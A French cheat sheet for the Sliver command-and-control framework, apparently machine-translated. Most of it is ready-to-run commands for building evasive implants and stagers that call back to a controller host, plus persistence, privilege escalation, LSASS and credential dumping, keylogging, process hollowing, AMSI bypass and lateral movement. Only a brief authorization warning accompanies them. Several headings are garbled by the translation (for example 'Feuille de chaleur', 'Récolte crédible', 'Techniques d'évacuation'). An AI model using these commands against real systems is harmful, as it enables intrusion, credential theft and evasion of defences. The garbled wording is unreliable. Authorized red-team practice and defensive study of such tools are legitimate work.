Aller au contenu

Feuille de chaleur cadre C2 Sliver

Copier toutes les commandes Générer PDF

Aperçu général

Sliver est un cadre moderne et ouvert d'émulation adversaire et d'équipe rouge conçu comme une alternative à Cobalt Strike. Il fournit des capacités de commandement et de contrôle avancées avec le soutien de plates-formes multiples, des communications évasives et des opérations en équipe.

C'est pas vrai. Attention : Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.

Installation

Binaires précompilés (Recommandé)

# Download latest release for Linux
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux -o sliver-server
chmod +x sliver-server

# Download latest release for macOS
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_macos -o sliver-server
chmod +x sliver-server

# Download latest release for Windows
# Download sliver-server_windows.exe from GitHub releases

Construire à partir de la source

# Install Go (version 1.19+)
git clone https://github.com/BishopFox/sliver.git
cd sliver
make
```_

### Installation Docker
```bash
# Pull official Docker image
docker pull bishopfox/sliver

# Run Sliver server in Docker
docker run -it -p 31337:31337 -p 8080:8080 bishopfox/sliver
```_

## Utilisation de base

### Démarrer Serveur Sliver
```bash
# Start the server (first run will generate certificates)
./sliver-server

# Start server with custom configuration
./sliver-server -c /path/to/config.json

# Start server in daemon mode
./sliver-server daemon

Connexion client

# Connect to local server
./sliver-client

# Connect to remote server
./sliver-client -c /path/to/client.cfg

# Generate new client configuration
./sliver-server operator --name username --lhost server-ip

Référence de commande

Gestion des serveurs

Command Description
help Display help information
version Show version information
operators List connected operators
kick-operator <name> Disconnect an operator
armory Access the Sliver armory (extensions)

Gestion de l'auditeur

Command Description
mtls Start mTLS listener
wg Start WireGuard listener
http Start HTTP listener
https Start HTTPS listener
dns Start DNS listener
jobs List active listeners
jobs -k <id> Kill a listener

Génération d'implants

Command Description
generate Generate implant
generate --mtls <host:port> Generate mTLS implant
generate --http <url> Generate HTTP implant
generate --dns <domain> Generate DNS implant
profiles List implant profiles
profiles new <name> Create new profile

Gestion des séances

Command Description
sessions List active sessions
use <session-id> Interact with session
background Background current session
sessions -k <id> Kill a session
sessions -K Kill all sessions

Configuration de l'auditeur

MTLS Auditeur (Recommandé)

# Start mTLS listener on default port (8888)
mtls

# Start mTLS listener on custom port
mtls -l 443

# Start mTLS listener with custom interface
mtls -l 0.0.0.0:8888

HTTP/HTTPS Auditeurs

# Start HTTP listener
http -l 80

# Start HTTPS listener with custom certificate
https -l 443 -c /path/to/cert.pem -k /path/to/key.pem

# Start HTTP listener with custom domain
http -l 80 -d example.com

DNS Auditeur

# Start DNS listener
dns -d example.com

# Start DNS listener with custom nameserver
dns -d example.com -l 53

Auditeur WireGuard

# Start WireGuard listener
wg -l 53

# Start WireGuard listener with custom key port
wg -l 53 -x 1234

Génération d'implants

Production d'implants de base

# Generate Windows executable
generate --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe

# Generate Linux ELF binary
generate --mtls 192.168.1.100:8888 --os linux --arch amd64 --format elf

# Generate macOS binary
generate --mtls 192.168.1.100:8888 --os darwin --arch amd64 --format macho

Options avancées d'implant

# Generate with custom name and save location
generate --mtls 192.168.1.100:8888 --os windows --save /tmp/implant.exe --name MyImplant

# Generate with evasion features
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols

# Generate shellcode
generate --mtls 192.168.1.100:8888 --os windows --format shellcode

# Generate shared library
generate --mtls 192.168.1.100:8888 --os linux --format shared

Charges utiles échelonnées

# Generate staged payload
generate --mtls 192.168.1.100:8888 --os windows --format exe --strategy staged

# Generate stager
generate stager --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe

Interactions de séance

Commandes de session de base

# Get system information
info

# Get current user
whoami

# Get current working directory
pwd

# List files and directories
ls

# Change directory
cd /path/to/directory

# Download file
download /remote/path/file.txt

# Upload file
upload /local/path/file.txt /remote/path/

Gestion des processus

# List processes
ps

# Get current process info
getpid

# Migrate to another process
migrate <pid>

# Execute command
execute <command>

# Start interactive shell
shell

# Terminate process
terminate <pid>

Opérations réseau

# Get network interfaces
ifconfig

# Get network connections
netstat

# Port forward
portfwd add --bind 127.0.0.1:8080 --remote 192.168.1.10:80

# List port forwards
portfwd

# Remove port forward
portfwd rm --id <id>

# SOCKS proxy
socks5 start

# Stop SOCKS proxy
socks5 stop

Escalade des privilèges

# Get current privileges
getprivs

# Attempt privilege escalation
getsystem

# Run as different user
runas -u username -p password <command>

# Impersonate token
impersonate <token-id>

# Revert to self
rev2self

Persistance

# Install service persistence
persistence service --name ServiceName --path /path/to/implant.exe

# Install registry persistence
persistence registry --hive HKCU --path "Software\\Microsoft\\Windows\\CurrentVersion\\Run" --key "MyApp"

# Remove persistence
persistence remove --id <persistence-id>

Caractéristiques avancées

Mouvement pivotant et latéral

# Generate pivot listener
pivots tcp --bind 0.0.0.0:9999

# Connect through pivot
generate --mtls pivot-host:9999 --os windows

# List active pivots
pivots

# Stop pivot
pivots --id <id> stop

Récolte crédible

# Dump process memory
procdump -p <pid> -s /tmp/dump.dmp

# Dump LSASS
procdump -n lsass.exe -s /tmp/lsass.dmp

# Screenshot
screenshot

# Keylogger
keylogger start
keylogger dump
keylogger stop

Techniques d'évacuation

# Process hollowing
execute-assembly --process notepad.exe /path/to/assembly.exe

# In-memory .NET assembly execution
execute-assembly /path/to/assembly.exe

# PowerShell execution
powershell -c "Get-Process"

# Bypass AMSI
armory install bypass-amsi

Profils et modèles

Création de profils

# Create new implant profile
profiles new windows-profile --mtls 192.168.1.100:8888 --os windows --arch amd64

# Generate from profile
generate --profile windows-profile

# List profiles
profiles

# Delete profile
profiles rm windows-profile

Personnalisation du profil C2

# HTTP C2 profile with custom headers
http --lhost 0.0.0.0 --lport 80 --website /path/to/website

# HTTPS with custom certificate
https --cert /path/to/cert.pem --key /path/to/key.pem --lhost 0.0.0.0 --lport 443

Extensions d'armoire

Installation d'extensions

# Update armory
armory update

# Install extension
armory install <extension-name>

# List available extensions
armory

# List installed extensions
armory installed

Extensions populaires

# Process injection techniques
armory install process-injection

# Credential dumping
armory install credman

# Registry operations
armory install registry

# WMI operations
armory install wmi

Opérations des équipes

Configuration multi-opérateurs

# Generate operator config
./sliver-server operator --name operator1 --lhost server-ip --save operator1.cfg

# Connect as operator
./sliver-client -c operator1.cfg

# List connected operators
operators

# Send message to operators
msg "Hello team!"

Partage des séances

# Share session with team
sessions -i <session-id> --shared

# Take control of shared session
use <session-id>

Dépannage

Questions communes

Problèmes de connexion

# Check listener status
jobs

# Restart listener
jobs -k <listener-id>
mtls -l 8888

# Check firewall rules
# Ensure ports are open on server

Détection des implants

# Use evasion options
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols --debug

# Try different communication protocols
generate --dns example.com --os windows

# Use staged payloads
generate stager --mtls 192.168.1.100:8888 --os windows

Problèmes de performance

# Adjust beacon interval
use <session-id>
reconfig --beacon-interval 60s

# Use compression
reconfig --compress

Déboguement

# Enable debug mode
./sliver-server --debug

# Check logs
tail -f ~/.sliver/logs/sliver.log

# Verbose client output
./sliver-client --debug

Considérations en matière de sécurité

Sécurité opérationnelle

  • Utiliser des communications chiffrées (mTLS recommandé)
  • Tourner régulièrement les certificats et les clés
  • Mettre en place des contrôles d'accès appropriés pour les opérateurs
  • Surveiller et enregistrer toutes les activités
  • Utiliser des serveurs de mise en scène pour éviter l'attribution directe

Meilleures pratiques d'évasion

  • Varier les intervalles des balises et les jitters
  • Utiliser des domaines et certificats d'apparence légitime
  • Mettre en œuvre le frontage du domaine si possible
  • Utiliser plusieurs canaux de communication
  • Mettre à jour régulièrement les implants et les techniques

Ressources

  • [Documents officiels] (LINK_5)
  • [Répertoire GitHub de livraison] (LINK_5)
  • [Bishop Fox Blog] (LINK_5)
  • [Communauté de livraison Wiki] (LINK_5)
  • [Entraînement des villages de l'équipe rouge] (LINK_5)

*Cette feuille de triche fournit une référence complète pour l'utilisation de Sliver C2 Framework. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *